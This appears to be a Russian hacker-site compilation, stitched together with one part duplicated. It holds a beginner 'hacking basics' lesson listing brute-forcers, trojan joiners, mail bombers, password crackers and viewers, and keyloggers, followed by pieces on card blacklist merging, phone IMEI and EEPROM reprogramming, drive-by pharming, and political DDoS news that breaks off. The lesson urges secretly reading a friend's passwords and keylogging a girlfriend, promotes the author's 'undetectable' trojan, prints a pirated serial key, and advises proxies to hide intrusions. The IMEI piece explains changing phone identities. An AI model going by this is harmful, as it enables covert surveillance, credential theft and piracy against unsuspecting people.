брутфорсу сервер входящих сообщений жертвы, например, если мы ломаем мыло vasia@pupkin.ru , то чаще всего сервером будет pop.pupkin.ru. Если же мы ломаем не e-mail, а сайт pupkin.ru, то надо указать ftp-сервер, это будет ftppupkin.ru . Брутфорсы имеют ещё массу полезных настроек, например, если ты подсмотрел, что твой друг вводит пароль из 5 символов, и первый его символ L, то тебе надо использовать подбор по маске. Маска будет выглядеть так: L#### . Я привёл общее описание, а для более близкого знакомства советую скачать wwwHack отсюда. [Сканнер портов] Поскольку этот урок - введение, сетевыми технологиями я тебя буду мучить в другой раз, но это всё равно надо знать. Сканнеры портов проверяют заданный диапазон IP-адресов на заданный открытый порт. Если порт открыт, этот IP добавляется в список. Где это применяется? Создатели так называемых "троянов" иногда предусматривают сканнер портов в своих творениях. Дело в том, что сервер трояна, попадая на машину, открывает в системе порт, по которому он получает команды клиента. Для тех, кто еще не догадался, обьясню: Зная, какой порт открывает наш троян, мы "спрашиваем каждый компьютер диапазона", открыт ли этот порт, и если это так, значит на этой машине сидит наш трой - можно смело коннектиться и управлять этим компьютером. Я рекомендую использовать Essentional Net Tools, так как это хороший сканнер с дополнительным набором функций. Это не просто сканнер - имей ввиду. За время своего существования он стал легендарным, и ещё не теряет своей актуальности. Он платный. Брат мой купил и дал мне серийник от версии 1.1: Name: Jan Klaassen S/N: 2957888021 [Сканнер безопасности] В Интернете существует два типа страниц: статические(HTML) и динамические(PHP,ASP,CGI). Если расширение страницы htm, html, это означает, что сожержимое страницы не зависит от пользователя и всегда неизменное - "статическое". Динамические страницы обрабатывают данные, полученные от пользователя, грубо говоря, они умеют думать. Естественно, ни о каких дырах в html-страницах и речи быть не может, дыры бывают только в скриптах динамических страниц. Самые распространенные уязвимости - XSS. Их хорошо описал DrWeb в статье "XSS новичкам", поэтому их суть я обьяснять не буду. Для автоматизации поиска уязвимостей XSS (и не только) хакеры используют сканнеры безопасности. Я рекомендую XSpider. [Джойнер] - (англ. Join - соединить, обьединить). Джойнер - это программа, позволяющая обьединять несколько файлов один, с возможностью приклеивать к полученному файлу произвольную иконку. Таким образом, используя джойнер, хакер может склеить троянского коня с какой-либо полезной утилитой, и спихнуть это жертве. Та, в свою очередь, открывая файл, считает, что запускает свою прогу, хотя фактически их запускается две(три, четыре, и т.д.), просто троян себя не выдаёт. Минус такого подхода в том, что большинство джойнеров определяются антивирусами. [mail bomber] Этот тип программ предназначен для "бомбления" электронной почты, т.е. закидывания огромным числом писем. Mail-бомберы широко используются спаммерами. Лично я спаммером не являюсь, но использую Ganja Spammer для подмены адреса отправителя. Очень удобно при занятиях "фишингом". Что это такое - расскажу позже. [Пароли Windows] Я уважаю продукты компании InsidePro, и советую закачивать их отсюда. Это: PasswordsPro, MD5Inside, PWLInside, SAMInside. Предназначение программ уже заложено в их названии, но я расскажу о каждой в отдельности. SAMinside - программа для взлома файла SAM. В Windows 2k/XP пароли пользователей хранятся в директории windowssystem32config, и называются соотв. SAM и SYSTEM, без расширения. Чтобы их скопировать для расшифровки, придётся юзать dos или альтернативную ОСь, как Windows PE. Так вот, пароли хранятся в зашифрованном виде, и чтобы их расшифровать, у тебя должны быть копии этих файлов. Надо забить их в SAMinside, поставить способ перебора, и ждать. PWLinside - аналогично, только это для ныне мёртвых Windows 95/98, где пароли (в т.ч. на инет) хранятся в директории винды в файлах, имеющих расширение *.PWL. MD5inside - расшифровывает MD5-хэш, используемый во многих системах авторизации. Расшифровав хэш, можно получить пароль. Кстати, в форумах IPB примерно такой хэш хранится в кукисах. PasswordsPro - мощный инструмент для работы с паролями, имеет все функции MD5inside, генерация хэшей, также он может показывать пароли, скрытые за звёздочками, для этого надо включить соотв. режим и навести мышей на поле с паролем. [Просмотр паролей] Если тебе интересно знать, что друг пишет твоей невесте по e-mail, достаточно прити к нему домой и отправить варить кофе, а в это время достаём дискетку и запускаем прогу, показывающую все его пассы, от мыла в том числе. Магия? Нет! Всё дело в том, что для удобства, чтобы избавить тебя от кайфа каждый раз при авторизации на сайте, в аське и т.д. вводить пароль, браузеры/аськи/почтовики его запоминают. Вот за это их и наказывают). Существует множество программ, показывающих всевозможные сохранённые пароли. Чтобы посмотреть, что там насохранял IE и Outgluk Express, можно воспользоваться программой PSPV. Для TheBat - TheBatPasswordViewer, для ICQ/Trillian/Miranda etc. - Advanced Instant Messenger Password Recovery, сокращенно AIMPR. [Троянская лошадь] Вот и подобрались к самому интересному). Этот подвид зверей так называется потому что действует подобно знаменитому троянскому коню. Проникая в систему пользователя, он там осваивается и работает на хозяина. Что я имею ввиду? В отличие от вируса, троян безобиден, если ты не в сети. Он активизируется, когда его создатель посылает ему команды через LAN или Интернет, например, он мо
жет по команде отправить хозяину твои пароли, и ещё много чего интересного, также позволяет взломщику лазить по твоим файлам и реестру, вобщем суть ты понял, а возможности у них у всех разные. Самые популярные троянцы: ALB, NetBus, LamerDeath. Но только вот все они уже давно палятся. А мой собственный называется LamerHack, можете поискать на моем сайте vladuha, и не палится, но сейчас доступна ещё слабенькая бета-версия, кроме того непалимость компенсируется размером сервера. [KeyLogger] Кейлоггер - это по-русски "клавиатурный шпион". Он отлавливает все твои нажатия клавиш и записывает их в файл, после чего может отправить их своему создателю, либо сохранить на винт. Полезно ставить у подруги - он запишет всё, что кому она пишет по аське. [Proxy] Если ты занимаешься чем-то не совсем законным, то тебя вряд ли устроит то, что на взломанном тобой сервере останется твой IP-адрес, по которому тебя вычислить нефиг делать. И что в таком случае? Существует такая вещь, называемая прокси-сервером, или сокс-сервером. Я не буду вдаваться в тонкости и обьяснять тебе, чем они отличаются - на данном этапе тебе это неважно. Суть одна - заменяется твой IP-адрес на адрес proxy-сервера. Это ипользуется, когда есть какие-то ограничения на твой IP, например, обьем музыки для скачивания, либо ограниченное число попыток регистрации аськи. А для самого первого случая нужно использовать анонимные или элитные прокси. Их недостаток - непостоянность. Они меняются каждые n часов. Всегда свежий список проксей находится здесь. В качестве программы для использования proxy я советую A4proxy. [Подмена HTTP-пакетов] Это я тоже буду описывать более подробно в будущих уроках. Вся информация в Сети передвётся т.н. "пакетами". Подобно пакетам секретной информации на войне, HTTP-пакеты имеют начинку и надпись: кому/куда и т.д. , с той лишь разницей, что ЭТА информация особо секретной не считается, но вызывает интерес. В заголовке пакета находится информация о браузере, откуда мы пришли, и каким скриптам какие данные передаются. Как ты понял, речь пойдёт о подмене этих данных. Возникает вопрос: "А зачем?" . А затем. Рассмотрим лучше на примере. У нас в Днепропетровске очень популярный интернет-провайдер "Алькар Телепорт". Он содержит несколько сайтов с интересными ресурсами, которые доступны только его пользователям. При заходе с других провов, они посылают нафиг. А как же эти сайты проверяют, откуда я пришел? По IP. Если, допустим, IP вида 212.15.x.x , то доступ разрешен. А если заменить referer(откуда я появился) на адрес самого сервера, то, скорее всего, он не будет нам ничего запрещать. Используется программа InetCrack, качаем её отсюда. Конечно, в этом разделе были описаны далеко не все программы, но основные.


Основы хакерства. Урок 1 [ Хакерство для новичков ] В этом уроке будут рассмотрены следующие две темы: введение и инструменты хакера. Введение Привет, читатель. Год назад я пришёл на ХЗ, и очень хотел стать хакером. Никто не мог мне обьяснить многие простые вещи, я видел много опытных, но стать на путь хакера мне помогли буквально единицы. И я могу их назвать: PinkPanther, DrWeb, R_a_ID_e_R. Я обучался сам, не надеясь ни на чью помощь, стараясь описывать свои познания в статьях для новичков. Так шло время, менялись поколения... Я не хочу усложнять жизнь ньюбов, я всегда к ним хорошо относился, и я считаю, что новички меют право знать. Тот, кто скажет, что я неправ, что мол "пусть сами разбираются, только так они вырастут", и прав и неправ. Да, упорные достигнут своей цели, но человек, которому это не надо, просто не будет читать эту статью. Тем, кто до сих пор мучает поисковики вопросами типа "как стать хакером" я решил посвятить цикл уроков, а может, и книгу. Ты пройдёшь путь от ламмера до хакера, изучишь технологии программирования, взлома и многое-многое другое. Проходи этот путь по моим урокам, и всё будет ОК. Это первый урок, посвящённый азам хакерства, он скорее завлекающий. Помни, всё это только игрушки, а настоящее хакерство пойдёт потом. А на этом этапе ты должен решить, нужно оно тебе, или нет. Постепенно мы изучим сетевые технологии, ты узнаешь, как устроен Интернет, что можно в нём найти интересного, что можно, а что нельзя. Добро пожаловать в наш мир! Инструменты хакера В этом разделе я опишу джентльменский набор хакера. Этими инструментами мы будем иногда пользоваться в дальнейшем. - Брутфорс - Сканнер портов - Сканнер безопасности - Джойнер - Mail Bomber - Bзлом паролей Windows - Просмотр паролей - Троян - KeyLogger - Скрыватель IP (прокси/сокс) - Подмена HTTP-запросов Начнём по порядку: [Брутфорс]. Bruteforce (в переводе с английского "грубая сила") применяется для подбора паролей от e-mail и ftp-серверов. Существует много видов программ-брутфорсов, но их способности схожи. При использовании таких программ на dial-up соединениях, где скорость не превышает 56 Кбит/сек, подбор может длиться долго и нудно, при использовании же скоростного интернета (ADSL, оптоволокно, спутник, и т.д.) скорость подбора увеличивается, однако тогда сьедается немало траффика. Оптимальный вариант - подбор по словарю. Взломщик составляет текстовый документ из возможных паролей жертвы, программа подключается на заданный ей сервер и по очереди перебирает пароли из файла. Если производится подбор паролей к почтовому ящику, нужно указать брутфорсу сервер входящих сообщений жертвы, например, если мы ломаем мыло vasia@pupkin.ru , то чаще всего сервером будет pop.pupkin.ru. Если же мы ломаем не e-mail, а сайт pupkin.ru, то надо указать ftp-сервер, это будет ftppupkin.ru . Брутфорсы имеют ещё массу полезных настроек, например, если ты подсмотрел, что твой друг вводит пароль из 5 символов, и первый его символ L, то тебе надо использовать подбор по маске. Маска будет выглядеть так: L#### . Я привёл общее описание, а для более близкого знакомства советую скачать wwwHack отсюда. [Сканнер портов] Поскольку этот урок - введение, сетевыми технологиями я тебя буду мучить в другой раз, но это всё равно надо знать. Сканнеры портов проверяют заданный диапазон IP-адресов на заданный открытый порт. Если порт открыт, этот IP добавляется в список. Где это применяется? Создатели так называемых "троянов" иногда предусматривают сканнер портов в своих творениях. Дело в том, что сервер трояна, попадая на машину, открывает в системе порт, по которому он получает команды клиента. Для тех, кто еще не догадался, обьясню: Зная, какой порт открывает наш троян, мы "спрашиваем каждый компьютер диапазона", открыт ли этот порт, и если это так, значит на этой машине сидит наш трой - можно смело коннектиться и управлять этим компьютером. Я рекомендую использовать Essentional Net Tools, так как это хороший сканнер с дополнительным набором функций. Это не просто сканнер - имей ввиду. За время своего существования он стал легендарным, и ещё не теряет своей актуальности. Он платный. Брат мой купил и дал мне серийник от версии 1.1: Name: Jan Klaassen S/N: 2957888021 [Сканнер безопасности] В Интернете существует два типа страниц: статические(HTML) и динамические(PHP,ASP,CGI). Если расширение страницы htm, html, это означает, что сожержимое страницы не зависит от пользователя и всегда неизменное - "статическое". Динамические страницы обрабатывают данные, полученные от пользователя, грубо говоря, они умеют думать. Естественно, ни о каких дырах в html-страницах и речи быть не может, дыры бывают только в скриптах динамических страниц. Самые распространенные уязвимости - XSS. Их хорошо описал DrWeb в статье "XSS новичкам", поэтому их суть я обьяснять не буду. Для автоматизации поиска уязвимостей XSS (и не только) хакеры используют сканнеры безопасности. Я рекомендую XSpider. [Джойнер] - (англ. Join - соединить, обьединить). Джойнер - это программа, позволяющая обьединять несколько файлов один, с возможностью приклеивать к полученному файлу произвольную иконку. Таким образом, используя джойнер, хакер может склеить троянского коня с какой-либо полезной утилитой, и спихнуть это жертве. Та, в свою очередь, открывая файл, считает, что запускает свою прогу, хотя фактически их запускается две(три, четыре, и т.д.), просто троян себя не выдаёт. Минус такого подхода в том, что большинство джойнеров определяются антивирусами. [mail bomber] Этот тип программ предназначен для "бомбления" электронной почты, т.е. закидывания огромным числом писем. Mail-бомберы широко используются спаммерами. Лично я спаммером не являюсь, но использую Ganja Spammer для подмены адреса отправителя. Очень удобно при занятиях "фишингом". Что это такое - расскажу позже. [Пароли Windows] Я уважаю продукты компании InsidePro, и советую закачивать их отсюда. Это: PasswordsPro, MD5Inside, PWLInside, SAMInside. Предназначение программ уже заложено в их названии, но я расскажу о каждой в отдельности. SAMinside - программа для взлома файла SAM. В Windows 2k/XP пароли пользователей хранятся в директории windowssystem32config, и называются соотв. SAM и SYSTEM, без расширения. Чтобы их скопировать для расшифровки, придётся юзать dos или альтернативную ОСь, как Windows PE. Так вот, пароли хранятся в зашифрованном виде, и чтобы их расшифровать, у тебя должны быть копии этих файлов. Надо забить их в SAMinside, поставить способ перебора, и ждать. PWLinside - аналогично, только это для ныне мёртвых Windows 95/98, где пароли (в т.ч. на инет) хранятся в директории винды в файлах, имеющих расширение *.PWL. MD5inside - расшифровывает MD5-хэш, используемый во многих системах авторизации. Расшифровав хэш, можно получить пароль. Кстати, в форумах IPB примерно такой хэш хранится в кукисах. PasswordsPro - мощный инструмент для работы с паролями, имеет все функции MD5inside, генерация хэшей, также он может показывать пароли, скрытые за звёздочками, для этого надо включить соотв. режим и навести мышей на поле с паролем. [Просмотр паролей] Если тебе интересно знать, что друг пишет твоей невесте по e-mail, достаточно прити к нему домой и отправить варить кофе, а в это время достаём дискетку и запускаем прогу, показывающую все его пассы, от мыла в том числе. Магия? Нет! Всё дело в том, что для удобства, чтобы избавить тебя от кайфа каждый раз при авторизации на сайте, в аське и т.д. вводить пароль, браузеры/аськи/почтовики его запоминают. Вот за это их и наказывают). Существует множество программ, показывающих всевозможные сохранённые пароли. Чтобы посмотреть, что там насохранял IE и Outgluk Express, можно воспользоваться программой PSPV. Для TheBat - TheBatPasswordViewer, для ICQ/Trillian/Miranda etc. - Advanced Instant Messenger Password Recovery, сокращенно AIMPR. [Троянская лошадь] Вот и подобрались к самому интересному). Этот подвид зверей так называется потому что действует подобно знаменитому троянскому коню. Проникая в систему пользователя, он там осваивается и работает на хозяина. Что я имею ввиду? В отличие от вируса, троян безобиден, если ты не в сети. Он активизируется, когда его создатель посылает ему команды через LAN или Интернет, например, он мо
жет по команде отправить хозяину твои пароли, и ещё много чего интересного, также позволяет взломщику лазить по твоим файлам и реестру, вобщем суть ты понял, а возможности у них у всех разные. Самые популярные троянцы: ALB, NetBus, LamerDeath. Но только вот все они уже давно палятся. А мой собственный называется LamerHack, можете поискать на моем сайте vladuha, и не палится, но сейчас доступна ещё слабенькая бета-версия, кроме того непалимость компенсируется размером сервера. [KeyLogger] Кейлоггер - это по-русски "клавиатурный шпион". Он отлавливает все твои нажатия клавиш и записывает их в файл, после чего может отправить их своему создателю, либо сохранить на винт. Полезно ставить у подруги - он запишет всё, что кому она пишет по аське. [Proxy] Если ты занимаешься чем-то не совсем законным, то тебя вряд ли устроит то, что на взломанном тобой сервере останется твой IP-адрес, по которому тебя вычислить нефиг делать. И что в таком случае? Существует такая вещь, называемая прокси-сервером, или сокс-сервером. Я не буду вдаваться в тонкости и обьяснять тебе, чем они отличаются - на данном этапе тебе это неважно. Суть одна - заменяется твой IP-адрес на адрес proxy-сервера. Это ипользуется, когда есть какие-то ограничения на твой IP, например, обьем музыки для скачивания, либо ограниченное число попыток регистрации аськи. А для самого первого случая нужно использовать анонимные или элитные прокси. Их недостаток - непостоянность. Они меняются каждые n часов. Всегда свежий список проксей находится здесь. В качестве программы для использования proxy я советую A4proxy. [Подмена HTTP-пакетов] Это я тоже буду описывать более подробно в будущих уроках. Вся информация в Сети передвётся т.н. "пакетами". Подобно пакетам секретной информации на войне, HTTP-пакеты имеют начинку и надпись: кому/куда и т.д. , с той лишь разницей, что ЭТА информация особо секретной не считается, но вызывает интерес. В заголовке пакета находится информация о браузере, откуда мы пришли, и каким скриптам какие данные передаются. Как ты понял, речь пойдёт о подмене этих данных. Возникает вопрос: "А зачем?" . А затем. Рассмотрим лучше на примере. У нас в Днепропетровске очень популярный интернет-провайдер "Алькар Телепорт". Он содержит несколько сайтов с интересными ресурсами, которые доступны только его пользователям. При заходе с других провов, они посылают нафиг. А как же эти сайты проверяют, откуда я пришел? По IP. Если, допустим, IP вида 212.15.x.x , то доступ разрешен. А если заменить referer(откуда я появился) на адрес самого сервера, то, скорее всего, он не будет нам ничего запрещать. Используется программа InetCrack, качаем её отсюда. Конечно, в этом разделе были описаны далеко не все программы, но основные.

Black List
[ Защита от кардинга ]

....Допустим мы имеем дело с терминалами, у которых страничная (DATA PAGE) организация памяти (например терминалы фирмы INGENICO).
Каждая DATA PAGE имеет размер памяти SIZE Кб. У нас есть несколько страниц N, на которых расположен Black List (то есть список карт, обработка которых терминалу запрещена).
Например:
....Card Nb............Exp.Date...FIRST and LAST NAME
4234567890123456.....0106.....PETR IVANOV
4234567890123457.....1205.....YURIY PANCHENKO
5338637890128..........0406.....ANDREY BOGATCHUK
-//--//--//--//--//--//--//--//--//--//--//--//--//--//-
6487387534729137.....1107.....VITALIY KLICHKO

....То есть информация упорядочена в порядке возрастания по полю, которое соответствует номеру карты клиента (номер карты может состоять минимум из 13 цифр, а максимум из 19 цифр).
....Приходит аналогичная информация расположенная на М страницах (также по SIZE Кб каждая). Но помимо двух этих полей имеется дополнительная информация по каждой карте, в которой указаны изменения (добавить (1) или удалить (0)) данную карту из Black List.
....При этом размер памяти в приборах обычно ограничен и нет возможности выйти за пределы более чем N+M DATA PAGE. Использовать динамическое распределение памяти нельзя. То есть все используемые массивы должны быть известного размера.
....Необходимо выполнить данные изменения в Black List.

....Списки Black List на страницах N и M, это списки ворованных или потерянных карт. И очень часто приходят обновления (нашли карту или опять кто ее лишился).
....Конечно под DATA PAGE можно понимать и обыкновенные файлы, что никак не убавляет и не осложняет поставленную задачу.

....Решение.
....I способ (сложность: N x M).
....Самое простое и крайне не эффективное решение: Берем первую пришедшую запись и обрабатываем ее. То есть ищем ее место, а потом удаляем (подтягивая весь оставшийся хвост) или добавляем (передвигая все остальные на один до конца). И так для всех пришедших карт на страницах М. То есть не трудно догадаться о сложности такого решения (NxM), а в этом мире борьба идет за секунды.

....II способ (Оптимальное решение. сложность: N).
....Допустим пришло три записи на страницах M с признаками {0, 1, 0}. То есть первую и третью удалить, вторую добавить.
1. Заведем одну переменную Temp и присвоим ей значение первой записи списка на страницах М.
2. Начинаем проход с самого начала по записям страниц N пока не доходим до записи соответствующей переменной Temp, то есть первой записи на страницах M.
3. Как ее обнаружили удаляем, а переменной Temp присваиваем значение второй записи со страниц М.
4. Продолжаем просмотр записей страниц N, одновременно передвигая их, так как была удалена одна запись и этот процесс продолжаем не до конца, а до места вставки переменной Temp, которая напоминаем уже соответствует второй записи страниц M.
5. В освободившееся место благополучно ее вставляем и присваиваем Temp последнюю третью запись со страниц М.
6. Продолжаем проход повторяя процесс описанный выше.

....Таким образом отсекаются проходы для каждой записи страниц M до конца по страницам N.

....Возникает справедливый вопрос: Как быть с таким алгоритмом, если пришли записи, которые надо только добавлять.
....Это порождает очередь (FIFO): первым пришел, первым ушел.
....Например: Пришли три записи и все три надо добавить. Добавили первую на страницы N, но одну запись с этой позиции помещаем в очередь так как не было свободного места. В следующую позицию ее добавляем, а оттуда запись помещаем в FIFO. В FIFO хранится одна запись. И так далее пока не добавим вторую запись. В FIFO появится две записи. При добавлении последней третей записи получаем FIFO из трех записей.
....Понятно данная FIFO будет существовать до конца, пока не обработаем все записи на страницах N. Но если бы пришли записи (а они наверняка есть), которые надо удалять, то эти записи уменьшали бы размер FIFO.
....Но все мы знаем, что такое очередь, и главный вопрос где ее хранить. Хранить мы ее будем на страницах M. В позициях уже рассмотренных элементов. Первая позиция освобождается благодаря буферу Temp, а размер FIFO никогда не превзойдет количества вставленных элементов и в худшем случае будет совпадать с этим количеством.
....А введя два дополнительных указателя (POINTER_1 и POINTER_2) на позиции будем знать с какой позиции взять запись, а в какую добавить.
....Таким образом наша очередь (FIFO), преследует (то увеличиваясь, то уменьшаясь или вовсе пропадая) исчезающую информацию на страницах M.

....Оптимизация данного алгоритма связана с поиском места Temp на страницах N и продолжение прохода начиная с этой позиции.
....Это применимо в двух случаях
- Всегда для первой записи со страниц M;
- в остальных случаях очередь должна быть нулевого размера (указатели POINTER_1 и POINTER_2 совпадают) и не надо двигать элемент со следующей позиции на предыдущую.

....Проход можно прекратить, если все записи на страницах М рассмотрены, очередь нулевого размера и ничего больше не надо передвигать.

:: EEPROM, IMEI-number ::
[ Защита от кардинга ]

EEPROM это участок памяти телефона, в котором хранятся так называемые пользовательские установки (имей номер, коды блокировок, значения контрольных сумм). Обычно EEPROM хранится в отдельной микросхеме. Программирование (прошивка) EEPROM производится с помощью специальных кабелей. Собственно программатор находится в телефоне. Специальный кабель или ИМЕЙ бокс (только для телефонов фирмы Моторолла) только осуществляет согласование Ком порта компьютера с последовательным портом телефона. Если по каким то причинам, Вам удалось, к примеру, полностью стереть имей номер или EEPROM целиком, телефон не только не будет работать. Он вообще откажется программироваться дальше. В этом случае Вам придется вооружиться паяльником и аккуратно выпаять микросхему EEPROM, перепрограммировать ее внешним программатором и затем впаять обратно. Все необходимое можно купить в магазине ЧИП и ДИП - wwwchip-dip.ru . В последних моделях фирмы Нокия EEPROM физически находится в той же микросхеме, что и основная память. В любом случае если Вы снимаете блокировку с телефона (точнее отключаете этот режим) Вам приходится иметь дело в первую очередь с EEPROM. Объем у EEPROM не большой от 2 до 32 КБайт. Совсем не вредно заранее скачивать к себе в компьютер содержимое EEPROM в качестве резервной копии. Много места не займете, а польза очевидна. Кстати в процессе копирования просмотрите содержимое. Некоторые программы имеют мерзкое свойство записывать в теле EEPROM свои соображения. Например, DEMO-DEMO-DEMO. С таким содержимым в своей памяти телефон работать отказывается. Flash сотового телефона. Flash это, как и EEPROM участок памяти, но значительно большего размера. Его объем составляет 1 Мбайт и более. В нем содержится все программное обеспечение телефона - алгоритмы взаимодействия с сетью, шифрация/дешифрация сигнала, определение уровня сигнала, управление мощностью передатчика, ретрансляция контрольных сигналов язык меню и все остальное прочее. Фирмы - производители постоянно изменяют, совершенствуют аппаратную часть телефона и соответственно изменяют и содержимое Flash. Именно Flash и называется прошивкой телефона. Имеется строгое соответствие между аппаратной частью телефона и содержимым Flash. Не составляет особого труда загнать в телефон не родную прошивку. Иногда телефон от такой операции выглядит, как настоящий, даже реагирует на команды с клавиатуры, но не работает. Или работает плохо - низкая чувствительность, отказ сети в обслуживании и прочее. На аппарате под батареей написан номер прошивки. При программировании необходимо заливать именно ту прошивку, которая указана. Если аппарат сделан для Китая или арабских стран на аппарате указывается прошивка с соответствующим языком. Английские там обычно есть. Можно оставить эту прошивку, можно ее вручную переделать под русский язык, а можно поэкспериментировать с другими вариантами Flash. Ориентироваться надо на дату выпуска аппарата. Модельный ряд фирмы производители изменяют примерно в одно время на всех заводах. Проблемой является так же то, что программы для снятия блокировок зачастую переделывают EEPROM, а затем стирают Flash и требуют себе для работы другой. Оптимальный вариант подсунуть им прежний Flash и посмотреть, что получилось. Но собственно Flash надо еще где-то взять. Слить его из телефона удается не всегда. Для этого и приходится хранить на диске множество вариантов Flash, в том числе арабских, китайских, европейских и израильских. Большинство из них так никогда и не пригодились. Некоторые удавалось переделать на русский язык, вручную переписав коды меню. Но такая операция достаточно трудоемка и имеет смысл, только если намечается большая партия аппаратов по приемлемой цене. Имей номер телефона (Imei number phone). Что это такое и как с ним бороться. Система связи GSM устроена таким образом, что каждый телефон обладает единственным во вселенной номером. Он указан обычно на задней крышке телефона под батареей. Путем несложных манипуляций можно вывести имей номер на экран дисплея из памяти аппарата. Простой пользователь обычно не имеет о нем представления. Ему достаточно знать телефонный номер, по которому ему можно позвонить. Система же с помощью имей номера, отслеживает конкретный телефонный аппарат. Обычно в базу данных заложены три списка. Так называемые белый, серый и черный. В белом списке указаны аппараты, к которым у системы нет никаких вопросов и проблем. В серый список заносятся аппараты с незначительными (обычно техническими) проблемами. В черном списке числятся аппараты, которым запрещен доступ в сеть (отказ в обслуживании). По нашим сведениям такие списки скрупулезно ведутся в развитых странах. У нас провайдеры пока не сильно продвинутые, но рано или поздно такой сервис появится. Если телефон украден и бывший владелец предпринял соответствующие меры, то телефон с этим имей номером можно отключить навсегда. Пропадает смысл воровства. По имей номеру можно вычислить тип аппарата, страну изготовитель, дату изготовления. Такие таблицы соответствия существуют. Из них можно узнать, например, что Ваш аппарат изготовлен не в Англии для Голландии, а Китае. Есть, однако, еще одно место, где этот номер всплывает. В процессе русификации, снятия блокировок, ремонта некоторые программы изменяют индивидуальный, имей номер, на свой собственный. Есть мнение, что авторы этих программ, очевидно, страдают манией величия или склонны к изощренному садизму. Если ваш бизнес связан с программированием мобильных телефонов, Вам совсем не улыбается иметь множество телефонов с одинаковыми номерами. При выходе на связь, система теоретически должна сразу занести их все в серый список. И покупатель будет, как минимум удивлен, когда увидит несоответствие, между номером на задней крышке и номером на дисплее. Для борьбы с этим явлением существует множество программ и списков этих кодов. Для примера имей номер в написании и программировании выглядит как 490565-61-260383-6 , а в памяти телефона как A610137B7W. Перепрограммирование сотовых телефонов. Кто собственно против? В древнеримском праве была такая мысль. Если непонятно, что происходит, смотри кому выгодно. Дело в том, что пока на 1 месте по возражениям на эту тему был Большой Брат. Его соображения сводятся к тому, что ворованные аппараты, перепродаются, а найти их после замены Imei номера невозможно. Для тех, кто еще не курсе, пусть для начала наши провайдеры заведут соответствующую базу данных, сделают ее открытой и доступной (что бы каждый желающий мог заглянуть, а не только Большой Брат) и присоединятся к соответствующим базам других стран. Следующими, в списке против, стоят провайдеры GSM. Они делают простой трюк, продают аппараты по заведомо низкой цене и доход получают за счет трафика. Электричку им навстречу. Блокировкой аппарата они лишают нас свободы выбора. За продажу нелоченных телефонов неизвестного происхождения Ваш салон сотовой связи провайдер может подвергнуть санкциям. Провайдеру очень шоколадно быть монополистом и самому поставлять телефоны на внутренний рынок. Если у Вас есть возможность, рекомендуем поинтересоваться ценами на телефоны в других странах Китай, Индия, ОАЕ и т.д. И Вы получите некоторое представление о том, с какими "скидками" продается все это у нас. Когда идет речь о хороших деньгах большие компании вполне могут и закон соответствующий протащить и рекламу дать, в том числе и в Интернете. Кривая разлочка, о которой так много написано во всех конференциях, конечно, имеет место быть, но не в ней дело. Использование нормальных программ и родных прошивок ГАРАНТИРУЕТ качество. Есть еще одно соображение. Доступ к программе телефона позволяет делать с ним все, что в пределах его технических возможностей. А такого рода свобода КАТЕГОРИЧЕСКИ не нравится производителям аппаратов, провайдерам, Большому Брату и всем остальным. Почему - подумайте сами. Мнение простого пользователя по большому счету мало кому интересно. Если у Вас появилась мысль купить себе мобильный телефон - несите Ваши денежки и не задавайте вопросов. Вам все пообещают и гарантируют. И если не работает сервис СМС сообщений, нет связи на даче, быстро садится батарея, или есть еще проблемы - несите Ваши денежки. Если есть желание поменять провайдера - не прячте Ваши денежки. Появились
непонятности в поведении счетов за переговоры - несите Ваши денежки и не задавайте вопросов. Все это безобразие называется просто - МОНОПОЛИЯ. Все измениться в лучшую сторону только с появлением новых провайдеров сотовой связи, не раньше.


 

Новый тип сетевых атак - Drive-by Pharming
[ Новые нападения ]

Компания Symantec совместно со Школой информатики при Университете Индианы предупреждают о выявлении новой разновидности так называемых фарминг-атак. Суть фарминга сводится к автоматическому перенаправлению пользователей на фальшивые сайты с целью хищения конфиденциальной информации, например, паролей и номеров банковских счетов. В отличие от фишинга, фарминг-атаки практически не требуют выполнения каких-либо действий потенциальной жертвой. При проведении фарминг-атак киберпреступники используют уязвимости в браузерах, операционных системах, а также программном обеспечении DNS-серверов. Новый тип фарминг-атак получил название Drive-by Pharming. Суть его сводится к тому, что злоумышленники меняют настройки маршрутизаторов или беспроводных точек доступа в интернет, после чего пользователи, сами того не подозревая, перенаправляются на вредоносные сайты. Данный тип атак представляет угрозу, прежде всего, для тех пользователей, которые подключены к Сети посредством широкополосных линий. Сценарий нападения, как правило, предполагает применение JavaScript-кода, который и вносит изменения в настойки оборудования потенциальной жертвы. Согласно исследованию, проведенному специалистами Университета Индианы, порядка 50 процентов пользователей широкополосных каналов теоретически могут стать жертвами атак Drive-by Pharming. Специалисты настоятельно рекомендуют установить на маршрутизаторах пароль или сменить заводской пароль, угадать который для злоумышленников практически не составляет труда. Кроме того, эксперты советуют не пренебрегать брандмауэрами, средствами обнаружения вторжений и стараться не переходить по ссылкам, полученным из неизвестных или ненадежных источников.

Сетевые «пеньки»
[ Новые нападения ]

«Во вторник вновь был атакован сайт ДПНИ, который уже не работает более суток. А сегодня ночью также прекратили свою работу сайты rne.org и сайт Кольца Патриотических ресурсов, после беспрецедентных DDoS-атак, которые шли явно не от хакеров-любителей. От националистов последовали ассиметричные ответы: были сломаны сайты молодежных движений «НАШИ» и «Молодой Гвардии» партии «Единой России», а также общефедеральный сайт партии «Единая Россия». В данный момент сайт молодежного Движения «НАШИ» возобновил свою работу, а общефедеральный сайт «Единой России» и «Молодой Гвардии» до сих пор не функционируют, как и патриотические сайты. «Эти атаки явно диктуются новыми конъюнктурными соображениями партии власти, а именно „Русским проектом". Совершенно очевидно, что для них альтернативные „Русскому Проекту" ресурсы являются идеологически опасными, разоблачающие их фарисейскую суть. Поэтому эти медийные атаки, кроме как испугом перед настоящими и независимыми конкурентами, ничем объяснить нельзя, так что временное прекращение работы независимых патриотических ресурсов - это победа искренних „непроектных" националистов- прокомментировал последние события независимый депутат Госдумы Николай Курьянович». Об этом 14 февраля сообщил официальный сайт депутата Государственной Думы РФ Н.Курьяновича.

Комментарий Аналитического отдела движения «Россия молодая»:

